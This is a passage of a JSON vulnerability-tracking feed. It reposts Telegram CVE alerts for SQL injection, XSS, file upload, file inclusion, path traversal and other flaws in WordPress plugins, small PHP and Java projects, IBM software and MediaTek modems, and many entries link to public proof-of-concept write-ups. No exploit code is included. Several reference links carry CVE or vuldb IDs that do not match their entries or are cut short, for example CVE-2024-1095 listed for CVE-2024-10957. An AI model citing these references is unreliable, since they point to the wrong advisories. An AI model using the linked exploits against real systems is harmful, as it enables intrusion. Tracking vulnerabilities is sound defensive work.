Intelligence\n\ud83d\udccc CVE ID: GHSA-hj25-chfx-qmx5\n\ud83d\udd17 Aliases: CVE-2024-11356\n\ud83d\udd39 Details: The tourmaster WordPress plugin before 5.3.4 does not sanitise and escape some parameters when outputting them in the page, which could allow unauthenticated users to perform Cross-Site Scripting attacks.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-11356\n2. https://wpscan.com/vulnerability/d0df54e-e99e-4539-9fd9-002c064213e", "creation_timestamp": "2025-01-06T06:40:27.000000Z"}, {"uuid": "62a986b2-9650-477b-a341-7c2d0e99b92f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6752-2M67-2M5V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/163", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-6752-2m67-2m5v\n\ud83d\udd17 Aliases: CVE-2024-20151\n\ud83d\udd39 Details: In Modem, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: MOLY01399339; Issue ID: MSV-1928.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-787\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-20151\n2. https://corp.mediatek.com/product-security-bulletin/January-2025", "creation_timestamp": "2025-01-06T06:40:40.000000Z"}, {"uuid": "69bdd812-6fbe-4663-9ab3-6a64a883970b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5JH2-6V7C-86VJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/97", "content": "\ud83d\udccc **CVE ID**: GHSA-5jh2-6v7c-86vj\n\ud83d\udd17 **Aliases**: CVE-2025-0213\n\ud83d\udd39 **Details**: A vulnerability was found in Campcodes Project Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /forms/update_forms.php?action=change_pic2&amp;id=4. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T18:30:23Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T18:30:23Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-284\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0213\n2. https://github.com/shaturo133/POCs/blob/main/Remote20Code20Execution20via20Arbitrary20File20Upload20in20Project20Management20System.md\n3. https://vuldb.com/?ctiid.290158\n4. https://vuldb.com/?id.290158\n5. https://vuldb.com/?submit.44200\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:38:01.000000Z"}, {"uuid": "4b220221-8b8a-44c5-b964-15cb7d525752", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VJ39-GWG7-6872", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/96", "content": "\ud83d\udccc **CVE ID**: GHSA-vj39-gwg7-6872\n\ud83d\udd17 **Aliases**: CVE-2025-0214\n\ud83d\udd39 **Details**: A vulnerability was found in TMD Custom Header Menu 4.0.0.1 on OpenCart. It has been rated as problematic. This issue affects some unknown processing of the file /admin/index.php. The manipulation of the argument headermenu_id leads to sql injection. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T18:30:23Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T18:30:22Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-74\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0214\n2. https://gist.github.com/mcdruid/ff4f29f4e830e9e91988c195d039\n3. https://vuldb.com/?ctiid.290159\n4. https://vuldb.com/?id.290159\n5. https://vuldb.com/?submit.44299", "creation_timestamp": "2025-01-05T01:37:56.000000Z"}, {"uuid": "6e03774f-aa71-4e1b-a37f-df96ede159d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5CHH-WV34-P78R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/86", "content": "\ud83d\udccc **CVE ID**: GHSA-5chh-wv34-p78r\n\ud83d\udd17 **Aliases**: CVE-2025-0211\n\ud83d\udd39 **Details**: A vulnerability was found in Campcodes School Faculty Scheduling System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/index.php. The manipulation of the argument page leads to file inclusion. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-73\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0211\n2. https://github.com/shaturo133/POCs/blob/main/LFI20in20School20Faculty20Scheduling20System.md\n3. https://vuldb.com/?ctiid.290156\n4. https://vuldb.com/?id.290156\n5. https://vuldb.com/?submit.44115\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:36:19.000000Z"}, {"uuid": "6cf43793-422a-4d40-bf86-b5b0968bd3ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WV9-JQ79-5P63", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/98", "content": "\ud83d\udccc **CVE ID**: GHSA-2wv9-jq79-5p63\n\ud83d\udd17 **Aliases**: CVE-2025-0212\n\ud83d\udd39 **Details**: A vulnerability was found in Campcodes Student Grading System 1.0. It has been classified as critical. This affects an unknown part of the file /view_students.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T18:30:23Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T18:30:22Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-74\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0212\n2. https://github.com/shaturo133/POCs/blob/main/SQL20Injection20in20Student20Grading20System.md\n3. https://vuldb.com/?ctiid.29015\n4. https://vuldb.com/?id.29015\n5. https://vuldb.com/?submit.44168\n6. https://www.campcodes.com", "creation_timestamp": "2025-01-05T01:38:06.000000Z"}, {"uuid": "3e777eab-096d-44db-b195-ec361af714ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VCP4-P2MP-8FPQ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/100", "content": "\ud83d\udccc **CVE ID**: GHSA-vcp4-p2mp-8fpq\n\ud83d\udd17 **Aliases**: CVE-2024-10957\n\ud83d\udd39 **Details**: The UpdraftPlus: WP Backup &amp; Migration Plugin plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.24.11 via deserialization of untrusted input in the 'recursive_unserialized_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must perform a search and replace action to trigger the exploit.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-502\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1095\n2. https://plugins.trac.wordpress.org/browser/updraftplus/trunk/includes/class-search-replace.php#L411\n3. https://plugins.trac.wordpress.org/changeset/3212299\n4. https://www.wordfence.com/threat-intel/vulnerabilities/id/429ed3-96b2-41-8a2-89b9a21ec058?source=cve", "creation_timestamp": "2025-01-05T01:38:16.000000Z"}, {"uuid": "1d91bd60-7183-4fd8-bd63-ae8fa53e8a97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7H6M-3862-6XR6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/107", "content": "\ud83d\udccc **CVE ID**: GHSA-7h6m-3862-6xr6\n\ud83d\udd17 **Aliases**: CVE-2025-0208\n\ud83d\udd39 **Details**: A vulnerability, which was classified as critical, was found in code-projects Online Shoe Store 1.0. This affects an unknown part of the file /summary.php. The manipulation of the argument tid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-74\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0208\n2. https://code-projects.org\n3. https://gist.github.com/th4s1s/24925a20d1f9336858dee1cbbb30c249\n4. https://vuldb.com/?ctiid.290145\n5. https://vuldb.com/?id.290145\n6. https://vuldb.com/?submit.44038", "creation_timestamp": "2025-01-05T01:38:59.000000Z"}, {"uuid": "0807efcb-0ba2-4b3a-8eca-db815c4b291b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G5CM-FP5C-4JFP", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/102", "content": "\ud83d\udccc **CVE ID**: GHSA-g5cm-fp5c-4jfp\n\ud83d\udd17 **Aliases**: CVE-2024-41763\n\ud83d\udd39 **Details**: IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3  uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-327\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-4163\n2. https://www.ibm.com/support/pages/node/180204", "creation_timestamp": "2025-01-05T01:38:27.000000Z"}, {"uuid": "b815d38f-dd35-4777-9a41-8df2e750cf48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-87R4-WG36-7X2V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/105", "content": "\ud83d\udccc **CVE ID**: GHSA-87r4-wg36-7x2v\n\ud83d\udd17 **Aliases**: CVE-2024-41765\n\ud83d\udd39 **Details**: IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing \"dot dot\" sequences (/../) to view arbitrary files on the system.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-22\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-4165\n2. https://www.ibm.com/support/pages/node/180201", "creation_timestamp": "2025-01-05T01:38:45.000000Z"}, {"uuid": "5af3c99d-0185-469b-a472-42c5c4aba911", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-99Q4-QXP3-PJPM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/104", "content": "\ud83d\udccc **CVE ID**: GHSA-99q4-qxp3-pjpm\n\ud83d\udd17 **Aliases**: CVE-2025-0207\n\ud83d\udd39 **Details**: A vulnerability, which was classified as critical, has been found in code-projects Online Shoe Store 1.0. Affected by this issue is some unknown functionality of the file /function/login.php. The manipulation of the argument password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-74\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-020\n2. https://code-projects.org\n3. https://gist.github.com/th4s1s/d10dfaebae5c8dbe54ad83d6325d81\n4. https://vuldb.com/?ctiid.290144\n5. https://vuldb.com/?id.290144\n6. https://vuldb.com/?submit.44035", "creation_timestamp": "2025-01-05T01:38:39.000000Z"}, {"uuid": "4e1a2929-b270-4dfa-a8cb-56bce9240e2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CW42-CP8C-QV2Q", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/103", "content": "\ud83d\udccc **CVE ID**: GHSA-cw42-cp8c-qv2q\n\ud83d\udd17 **Aliases**: CVE-2024-41767\n\ud83d\udd39 **Details**: IBM Engineering Lifecycle Optimization - Publishing 7.0.2 and 7.0.3 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify, or delete information in the back-end database.\n\ud83d\udd22 **Severity**: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n\ud83d\uddd3\ufe0f **Modified**: 2025-01-04T15:30:45Z\n\ud83d\uddd3\ufe0f **Published**: 2025-01-04T15:30:45Z\n\ud83c\udff7\ufe0f **CWE IDs**: CWE-89\n\ud83d\udd17 **References**:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-416\n2. https://www.ibm.com/support/pages/node/180199", "creation_timestamp": "2025-01-05T01:38:34.000000Z"}, {"uuid": "b35ab0bc-5d43-4c6b-a3f5-8aadbf9fb9f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W2VX-FP9Q-36PH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-w2vx-fp9q-36ph\n\ud83d\udd17 Aliases: CVE-2024-53241\n\ud83d\udd39 Details: In the Linux kernel, the following vulnerability has been resolved:\n\nx86/xen: don't do PV iret hypercall through hypercall page\n\nInstead of jumping to the Xen hypercall page for doing the iret\nhypercall, directly code the required sequence in xen-asm.S.\n\nThis is done in preparation of no longer using hypercall page at all,\nas it has shown to cause problems with speculation mitigations.\n\nThis is part of XSA-466 / CVE-2024-53241.\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T09:30:42Z\n\ud83d\uddd3\ufe0f Published: 2024-12-24T12:30:42Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-53241\n2. https://git.kernel.org/stable/c/05df6e6cd9a6b8aee33c3c18c9f3b3566d4a5\n3. https://git.kernel.org/stable/c/82c211ead1ec440dbf812e1b03b5e3c44b93d\n4. https://git.kernel.org/stable/c/a296dff62d6c6bfc5fbebdf2bee0d5ac0438906\n5. https://git.kernel.org/stable/c/cb4cfa6213a44fa4814186dfdf12502d036e3\n6. https://git.kernel.org/stable/c/fc3fdad0a44062d566aae3289d490de02d30\n7. https://git.kernel.org/stable/c/fa1985f613fed94a9da055b13ca51214c694f\n8. http://www.openwall.com/lists/oss-security/2024/12/1/2\n9. http://www.openwall.com/lists/oss-security/2024/12/23/1\n10. http://www.openwall.com/lists/oss-security/2025/01/05/1\n11. http://www.openwall.com/lists/oss-security/2025/01/05/2\n12. http://xenbits.xen.org/xsa/advisory-466.html", "creation_timestamp": "2025-01-05T09:36:21.000000Z"}, {"uuid": "bc158ba6-5ff7-436f-95c2-1ff0782bd4da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C37C-P2GQ-C2G7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/121", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-c37c-p2gq-c2g7\n\ud83d\udd17 Aliases: CVE-2024-13133\n\ud83d\udd39 Details: A vulnerability, which was classified as critical, has been found in ZeroWdd studentmanager 1.0. This issue affects the function addStudent/editStudent of the file src/main/Java/com/wdd/studentmanager/controller/StudentController. java. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T06:30:29Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T06:30:29Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-284\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13133\n2. https://github.com/ZeroWdd/studentmanager/issues/16\n3. https://github.com/ZeroWdd/studentmanager/issues/16#issue-2553409\n4. https://vuldb.com/?ctiid.29020\n5. https://vuldb.com/?id.29020", "creation_timestamp": "2025-01-05T06:38:45.000000Z"}, {"uuid": "a7bf301b-1c48-4361-acc3-20b21afa6432", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J98J-8R2W-J3GQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/120", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-j98j-8r2w-j3gq\n\ud83d\udd17 Aliases: CVE-2024-13132\n\ud83d\udd39 Details: A vulnerability classified as problematic was found in Emlog Pro up to 2.4.3. This vulnerability affects unknown code of the file /admin/article.php of the component Subpage Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T06:30:29Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T06:30:29Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-79\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13132\n2. https://github.com/emlog/emlog/issues/309\n3. https://github.com/emlog/emlog/issues/309#issue-25531359\n4. https://vuldb.com/?ctiid.290206\n5. https://vuldb.com/?id.290206\n6. https://vuldb.com/?submit.46912", "creation_timestamp": "2025-01-05T06:38:39.000000Z"}, {"uuid": "4681eb6f-db58-4db2-ac6b-9b420e57e8bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X83J-H8X8-CJ5H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/148", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-x83j-h8x8-cj5h\n\ud83d\udd17 Aliases: CVE-2024-13145\n\ud83d\udd39 Details: A vulnerability classified as critical was found in zhenfeng13 My-Blog 1.0. Affected by this vulnerability is the function upload of the file src/main/java/com/site/blog/my/core/controller/admin/uploadController. java. The manipulation of the argument file leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T03:30:39Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T03:30:39Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-284\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13145\n2. https://github.com/ZHENFENG13/My-Blog/issues/141\n3. https://github.com/ZHENFENG13/My-Blog/issues/141#issue-259820153\n4. https://vuldb.com/?ctiid.290233\n5. https://vuldb.com/?id.290233\n6. https://vuldb.com/?submit.469221", "creation_timestamp": "2025-01-06T03:37:27.000000Z"}, {"uuid": "65acf661-85ee-4b54-a20f-0469bce3038c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VVC3-X74M-RG8V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/152", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-vvc3-x74m-rg8v\n\ud83d\udd17 Aliases: CVE-2024-20154\n\ud83d\udd39 Details: In Modem, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00720348; Issue ID: MSV-2392.\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:45Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-121\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-20154\n2. https://corp.mediatek.com/product-security-bulletin/January-2025", "creation_timestamp": "2025-01-06T06:40:19.000000Z"}, {"uuid": "780d8b5a-a1a4-484e-a963-e622e077d45c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQ4V-G552-CGFG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/126", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-wq4v-g552-cgfg\n\ud83d\udd17 Aliases: CVE-2024-13138\n\ud83d\udd39 Details: A vulnerability was found in wangl1989 mysiteforme 1.0. It has been declared as critical. This vulnerability affects the function upload of the file src/main/java/com/mysiteform/admin/service/ipl/LocalUploadServiceImpl. The manipulation of the argument test leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T12:30:30Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T12:30:30Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-284\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13138\n2. https://github.com/wangl1989/mysiteforme/issues/55\n3. https://github.com/wangl1989/mysiteforme/issues/55#issue-25868654\n4. https://vuldb.com/?ctiid.290212\n5. https://vuldb.com/?id.290212\n6. https://vuldb.com/?submit.468511", "creation_timestamp": "2025-01-05T12:39:26.000000Z"}, {"uuid": "4234ac85-9007-4e32-91f7-7840457d2b14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JH5Q-PR4Q-X6J4", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/139", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-jh5q-pr4q-x6j4\n\ud83d\udd17 Aliases: CVE-2025-0228\n\ud83d\udd39 Details: A vulnerability has been found in code-projects Local Storage Todo 